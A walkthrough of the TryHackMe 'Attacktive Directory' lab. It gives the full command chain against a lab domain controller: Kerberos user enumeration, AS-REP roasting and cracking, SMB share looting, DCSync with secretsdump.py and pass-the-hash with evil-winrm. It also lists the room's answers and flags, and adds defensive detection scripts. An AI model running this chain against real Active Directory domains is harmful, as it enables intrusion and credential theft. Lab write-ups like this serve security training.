Attacktive Directory TryHackMe Lab HACKING ACTIVE DIRECTORY
Exploiting Vulnerable Domain Controller.
Steps
1. Connect to the VM: sudo openvpn lglen001.ovpn
2. Follow the steps at https://tryhackme.com/room/attacktivedirectory
3. In the enumeration tab we will run a basic nmap scan: nmap [target IP]
4. I can assume it is running Active Directory by seeing that Kerberos, NetBIOS and LDAP are running: port 389 is LDAP, 88 is Kerberos and 139 is NetBIOS.
5. If we want to see the service versions on the machine we will run nmap [target IP] -sV
6. After this we get the third answer, .local (TLD is top-level domain).
7. Going back to the first question, we can use enum4linux; we can also use msfconsole, even though the answer is enum4linux.
8. I can see from the output that we get THM-AD as the domain.
9. msfconsole attempt:
10. msfconsole
11. use auxiliary/scanner/smb/smb_version
12. show options
13. set RHOSTS [target IP]
14. run
15. We will then see the domain name.
What tool will allow us to enumerate port 139/445? enum4linux
What is the NetBIOS-Domain Name of the machine? THM-AD
What invalid TLD do people commonly use for their Active Directory Domain? .local
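As an added example (not part of the original walkthrough or the TryHackMe room), the following Python script checks the port pattern from step 4 programmatically: it parses greppable nmap output (nmap -oG) and flags hosts that expose the domain controller service ports together. The scan output, the second host 10.10.115.40 and the indicator-port table are constructed for the example; 10.10.115.28 is the lab DC address used later in the walkthrough.

```python
import re

# Ports that, seen together, point to an Active Directory domain controller:
# the signal the walkthrough reads from its nmap output (88 Kerberos,
# 389 LDAP, 139 NetBIOS) plus the SMB, LDAPS and Global Catalog ports.
AD_INDICATOR_PORTS = {
    88: "kerberos",
    139: "netbios-ssn",
    389: "ldap",
    445: "microsoft-ds",
    636: "ldaps",
    3268: "globalcatLDAP",
}

# Constructed greppable output (nmap -oG) for two hosts. 10.10.115.28 is the
# lab DC address; 10.10.115.40 is a made-up non-AD host for contrast.
SAMPLE_GNMAP = """\
# Nmap 7.93 scan initiated as: nmap -oG - 10.10.115.0/24
Host: 10.10.115.28 ()\tStatus: Up
Host: 10.10.115.28 ()\tPorts: 53/open/tcp//domain///, 88/open/tcp//kerberos-sec///, 139/open/tcp//netbios-ssn///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 3268/open/tcp//ldap///\tIgnored State: closed (994)
Host: 10.10.115.40 ()\tStatus: Up
Host: 10.10.115.40 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/filtered/tcp//https///\tIgnored State: closed (997)
# Nmap done
"""


def parse_gnmap(text):
    """Map each host in greppable nmap output to its set of open TCP ports."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        open_ports = hosts.setdefault(ip, set())
        # Drop the trailing "Ignored State" summary before splitting entries.
        ports_field = line.split("Ports:", 1)[1].split("\tIgnored State:")[0]
        for entry in ports_field.split(","):
            # entry layout: port/state/protocol/owner/service/rpc info/version/
            fields = entry.strip().split("/")
            if len(fields) >= 3 and fields[1] == "open" and fields[2] == "tcp":
                open_ports.add(int(fields[0]))
    return hosts


def likely_domain_controllers(hosts, minimum_hits=3):
    """Return {ip: [matching ports]} for hosts exposing at least
    `minimum_hits` of the AD indicator ports."""
    flagged = {}
    for ip, ports in hosts.items():
        hits = sorted(p for p in ports if p in AD_INDICATOR_PORTS)
        if len(hits) >= minimum_hits:
            flagged[ip] = hits
    return flagged


if __name__ == "__main__":
    for ip, hits in likely_domain_controllers(parse_gnmap(SAMPLE_GNMAP)).items():
        names = ", ".join(f"{p}/{AD_INDICATOR_PORTS[p]}" for p in hits)
        print(f"{ip}: likely domain controller ({names})")
```

The same parser works on a real nmap -oG file; a filtered port (443 above) is deliberately not counted as open.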
Enumerating users via Kerberos
1. Now enumerate users.
2. Follow the steps to download kerbrute: https://github.com/ropnop/kerbrute/releases
3. After a lot of failure I realized that none of the packages will run in my VM because my host machine is ARM64, not amd64. I suggest using a different tool if needed, but for this lab this tool is necessary. I used linwinpwn with the RID brute force option.
4. Follow the steps in another environment or their AttackBox.
5. cd into the kerbrute directory.
6. ./kerbrute_linux_amd64 userenum -d spookysec.local --dc [target machine domain controller] users.txt
7. Answer the TryHackMe questions.
What command within Kerbrute will allow us to enumerate valid usernames? userenum
What notable account is discovered? (These should jump out at you) svc-admin
What is the other notable account discovered? (These should jump out at you) backup
Exploiting Active Directory
1. I will use Impacket for this section, specifically GetNPUsers.py. The tool is in /opt/impacket/examples/, so cd /opt/impacket/examples/
2. python3 GetNPUsers.py to get the help options
3. python3 GetNPUsers.py spookysec.local/svc-admin -no-pass -dc-ip 10.10.115.28 (we run this command with our domain name and the svc-admin user, no password, and the domain controller's IP)
4. This command is what we need to produce the TGT output for svc-admin, which is the hash value.
5. Now crack the hash. Start by cd'ing to the Desktop directory, then nano hash.txt and place the hash in that file. We will use john to crack the hash.
6. john hash.txt --wordlist=passwords.txt
7. The password we received for svc-admin is management2005
8. Answer the questions:
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password? svc-admin
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name) Kerberos 5 AS-REP etype 23
What mode is the hash? 18200
Now crack the hash with the modified password list provided, what is the user account's password? management2005
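Both techniques used so far, username enumeration with kerbrute and AS-REP roasting with GetNPUsers.py, leave traces in the domain controller's Security log as event 4768 (Kerberos TGT requested). As an added example that is not from the walkthrough or the room, this Python script runs two detections over constructed 4768 records: a burst of "client principal unknown" (result 0x6) failures for many different names from one client address, and a successful TGT request with Pre-Authentication Type 0 and an RC4 (0x17) ticket, which is what a GetNPUsers.py request against svc-admin looks like on the DC. The records, client addresses and every username except svc-admin are made up for the example.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Event:
    """Security event 4768 (Kerberos TGT requested), reduced to the fields
    the two detections need."""
    time: datetime
    account: str
    client: str     # Client Address
    result: str     # Result Code: 0x0 success, 0x6 principal unknown, 0x18 pre-auth failed
    preauth: int    # Pre-Authentication Type: 0 = none, 2 = PA-ENC-TIMESTAMP
    etype: str      # Ticket Encryption Type: 0x17 = RC4-HMAC, 0x12 = AES256


def build_sample_events():
    """Constructed 4768 records (not captured from the lab): a guessing
    burst, ordinary logons, one typo, and one AS-REP roasting request."""
    base = datetime(2023, 6, 1, 10, 0, 0)
    events = []
    # Ten names that do not exist, tried from one client in under 30 seconds.
    # (Names that do exist are answered with "pre-authentication required"
    # instead and are left out of this sample.)
    unknown = ["admin", "sqlservice", "ashley", "alice", "helpdesk",
               "ftp", "guest2", "test", "jsmith", "printer"]
    for i, name in enumerate(unknown):
        events.append(Event(base + timedelta(seconds=3 * i), name,
                            "10.50.1.5", "0x6", 2, "0x12"))
    # Ordinary workstation logons: pre-auth performed, AES ticket.
    for i, (name, ip) in enumerate([("james", "10.50.2.10"),
                                    ("robin", "10.50.2.11"),
                                    ("ryan", "10.50.2.12")]):
        events.append(Event(base + timedelta(minutes=5, seconds=i), name,
                            ip, "0x0", 2, "0x12"))
    # A single mistyped username: one 0x6 on its own is not enumeration.
    events.append(Event(base + timedelta(minutes=6), "jame",
                        "10.50.2.10", "0x6", 2, "0x12"))
    # Successful TGT request with no pre-authentication and an RC4 ticket:
    # the AS-REP roasting pattern against an account with
    # "Do not require Kerberos preauthentication" set.
    events.append(Event(base + timedelta(minutes=7), "svc-admin",
                        "10.50.1.5", "0x0", 0, "0x17"))
    return events


def detect_user_enumeration(events, threshold=5, window=timedelta(seconds=60)):
    """Clients that produced 0x6 failures for at least `threshold` distinct
    account names inside any span of length `window`.
    Returns {client: largest distinct-name count seen in one window}."""
    by_client = defaultdict(list)
    for e in events:
        if e.result.lower() == "0x6":
            by_client[e.client].append(e)
    flagged = {}
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e.time)
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it fits within `window`.
            while evs[end].time - evs[start].time > window:
                start += 1
            names = {e.account for e in evs[start:end + 1]}
            if len(names) >= threshold:
                flagged[client] = max(flagged.get(client, 0), len(names))
    return flagged


def detect_asrep_roast(events):
    """Successful TGT requests made without pre-authentication that were
    issued an RC4 ticket, as (account, client) pairs."""
    return sorted({(e.account, e.client) for e in events
                   if e.result.lower() == "0x0"
                   and e.preauth == 0
                   and e.etype.lower() == "0x17"})


if __name__ == "__main__":
    evs = build_sample_events()
    print("enumeration sources:", detect_user_enumeration(evs))
    print("AS-REP roast candidates:", detect_asrep_roast(evs))
```

The fix on the defending side is the one the room's flag hints at: clear the "Do not require Kerberos preauthentication" flag on svc-admin, and where an account must keep it, make sure it has a long random password and no RC4 support so the AS-REP is not crackable offline.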
Enumerating shares
1. We can use smbclient for SMB enumeration. We will run this command:
2. sudo smbclient -U spookysec.local/svc-admin -L //10.10.115.28
3. We will enter the password we received for svc-admin: management2005
4. Then we will receive all shares in the environment.
5. Of those 6 shares, we want to see what is in the backup share, the only one we can get into, so we connect to it with smbclient.
6. We will get the smb directory prompt.
7. Use the pwd command to see the current directory.
8. ls
9. Then: get backup_credentials.txt
10. nano backup_credentials.txt
11. The file contains YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw; the text is base64.
12. Go online and use a base64 decoder.
13. Decoded output: backup@spookysec.local:backup2517860
14. Answer the questions:
What utility can we use to map remote SMB shares? smbclient
Which option will list shares? -L
How many remote shares is the server listing? 6
There is one particular share that we have access to that contains a text file. Which share is it? backup
What is the content of the file? YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
Decoding the contents of the file, what is the full contents? backup@spookysec.local:backup2517860
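As an added example that is not part of the walkthrough, this Python script does the decoding step locally instead of through an online decoder (credentials should not be pasted into third-party sites) and generalises it: it scans file content for base64 tokens, decodes those that yield printable text, and reports any with the user@domain:password shape of the string found in the backup share. The surrounding file text is constructed; the base64 string is the one from backup_credentials.txt above.

```python
import base64
import binascii
import re
import string

# Constructed stand-in for a text file found on a share. The base64 line is
# the one from the walkthrough; the other lines are made up for the example.
SAMPLE_FILE = """\
backup notes
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
ticket ref 20230601
"""

# Runs of base64 alphabet characters long enough to be worth decoding.
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# user@domain:secret, the shape of backup@spookysec.local:backup2517860
CREDENTIAL_SHAPE = re.compile(r"^(?P<user>[^@:\s]+)@(?P<domain>[^@:\s]+):(?P<secret>\S+)$")
PRINTABLE = set(string.printable)


def decode_if_text(token):
    """Return the decoded string when `token` is valid base64 that decodes
    to printable text, otherwise None (binary blobs and hex strings that
    merely look like base64 are rejected here)."""
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if text and all(ch in PRINTABLE for ch in text):
        return text
    return None


def find_encoded_credentials(content):
    """Scan text for base64 tokens that decode to user@domain:secret and
    return one dict per finding."""
    findings = []
    for token in BASE64_TOKEN.findall(content):
        decoded = decode_if_text(token)
        if decoded is None:
            continue
        match = CREDENTIAL_SHAPE.match(decoded.strip())
        if match:
            findings.append({
                "user": match["user"],
                "domain": match["domain"],
                "secret": match["secret"],
                "encoded": token,
            })
    return findings


if __name__ == "__main__":
    for f in find_encoded_credentials(SAMPLE_FILE):
        print(f"{f['user']}@{f['domain']} has a base64-encoded secret in the file")
```

Run over a directory of share contents, the same scan is a cheap way to find credentials left in plain files before someone else does; base64 is an encoding, not encryption, and gives them no protection.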
Elevating privileges in the domain
With the backup user account I now have more privileges than before. As the backup account for the Domain Controller, it has elevated privileges beyond regular users: a unique permission assigned to this account allows it to synchronize all Active Directory modifications, including password hashes, to my user account.
Given this valuable information, I can leverage a tool called "secretsdump.py" within Impacket. This tool extracts all the password hashes that this account can pull from the domain controller through that synchronization. By exploiting this capability, I will effectively gain complete control over the AD domain.
1. The tool is in /opt/impacket/examples/, so cd /opt/impacket/examples/
2. sudo secretsdump.py
3. sudo secretsdump.py -dc-ip 10.10.171.96 spookysec.local/backup:backup2517860@10.10.171.96
4. This command gets us the hashes for all of the accounts in this Active Directory. We are interested in the NTLM hash, which is the third string: 0e0363213e37b94221497260b0bcb4fc
5. We go to a fresh terminal and cd /opt/impacket/examples/
6. We will then use evil-winrm, a tool that allows us to gain access using the hash.
7. The command: sudo evil-winrm -i 10.10.171.96 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
8. If it works, I'll get Administrator access to the Administrator directory.
9. From that point we can complete the Attacktive Directory TryHackMe lab.
10. Answer the questions:
What method allowed us to dump NTDS.DIT? DRSUAPI
What is the Administrator's NTLM hash? 0e0363213e37b94221497260b0bcb4fc
What method of attack could allow us to authenticate as the user without the password? Pass The Hash
Using a tool called Evil-WinRM, what option will allow us to use a hash? -H
11. Flags:
svc-admin: TryHackMe{K3rb3r0s_Pr3_4uth}
backup: TryHackMe{B4ckM3UpSc0tty!}
Administrator: TryHackMe{4ctiveD1rectoryM4st3r}
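As an added example, not from the walkthrough, this Python script parses secretsdump.py-style output lines (domain\user:rid:lmhash:nthash:::) so the NT hash is picked out by field rather than by eye, and then audits the result the way a defender reviewing an authorized dump would: accounts with an empty password and NT hashes shared by more than one account (the same password in use on several accounts). The Administrator NT hash is the value quoted above; every other account, RID and hash in the sample is made up.

```python
from collections import defaultdict

# Well-known values: the LM field secretsdump.py prints when LM hashes are
# not stored, and the NT hash of the empty password.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed secretsdump.py-style output. The Administrator NT hash is the
# one from the walkthrough; the other accounts, RIDs and hashes are made up.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
spookysec.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
spookysec.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
spookysec.local\\svc-admin:1113:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
spookysec.local\\backup:1118:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
spookysec.local\\helpdesk:1120:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
[*] Kerberos keys grabbed
"""


def parse_secretsdump(text):
    """Return {account: {"rid": int, "lm": str, "nt": str}} for the hash
    lines; status lines starting with [*] and anything else are skipped."""
    accounts = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        # A hash line has exactly 7 colon-separated fields, the last 3 empty.
        if len(parts) != 7 or parts[4:] != ["", "", ""]:
            continue
        name, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not rid.isdigit() or len(nt) != 32:
            continue
        accounts[name] = {"rid": int(rid), "lm": lm, "nt": nt}
    return accounts


def audit_hashes(accounts):
    """Flag accounts with the empty-password NT hash and NT hashes that more
    than one account shares."""
    by_nt = defaultdict(list)
    for name, h in accounts.items():
        by_nt[h["nt"]].append(name)
    empty = sorted(by_nt.get(EMPTY_NT_HASH, []))
    shared = {nt: sorted(names) for nt, names in by_nt.items()
              if len(names) > 1 and nt != EMPTY_NT_HASH}
    return {"empty_password": empty, "shared_password": shared}


if __name__ == "__main__":
    accounts = parse_secretsdump(SAMPLE_DUMP)
    print("Administrator NT hash:", accounts["spookysec.local\\Administrator"]["nt"])
    print(audit_hashes(accounts))
```

The audit is the reason a defender cares about the same data: an NT hash is a password-equivalent (pass the hash works with it directly), so a shared hash across accounts means one compromise opens all of them, and rotating those passwords is the remediation.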
Lessons Learned
During the Attacktive Directory TryHackMe engagement, several important lessons were learned.
Firstly, it is crucial to establish a secure connection to the virtual machine by following the provided instructions, such as using the appropriate OpenVPN configuration file.
Secondly, meticulously following the step-by-step guidelines and instructions provided in the lab or resource is paramount for success. Enumeration plays a vital role in penetration testing, and tools like Nmap should be used to identify the services running on the target machine. Paying attention to port numbers and associated services, such as Kerberos, LDAP, and NetBIOS running on ports 389, 88, and 139 respectively, can indicate the presence of Active Directory.
Enumeration tools like enum4linux and Metasploit's msfconsole are helpful for gathering information and performing reconnaissance. Understanding the architecture of the machine you are working from is also important, as some tools ship only as amd64 binaries that will not run on ARM64.
Exploiting Active Directory often involves extracting user account information, such as usernames and password hashes. Impacket, a powerful Python library, provides various tools for interacting with Active Directory, including GetNPUsers.py for retrieving password hashes and secretsdump.py for dumping NTDS.DIT. Hash cracking tools like John the Ripper can be employed to recover plaintext passwords from the hashes.
smbclient proves valuable for SMB enumeration, listing shares, and accessing files within those shares. Any encoded content found there, such as the base64-encoded file, must be decoded, for example with an online decoding tool.
Privilege escalation is possible by leveraging higher privileged user accounts, such as the backup account, which may provide access to additional resources and sensitive information. Tools like secretsdump.py from Impacket can be used to retrieve password hashes synced with the domain controller.
Evil-WinRM, a remote Windows command execution tool, can use the obtained password hash to gain access to the target machine without the password (pass the hash). Proper documentation of discovered credentials and associated user accounts is essential for progress throughout the engagement.
These lessons provide valuable insights for conducting penetration testing and highlight the importance of following ethical guidelines and obtaining legal authorization for security testing activities.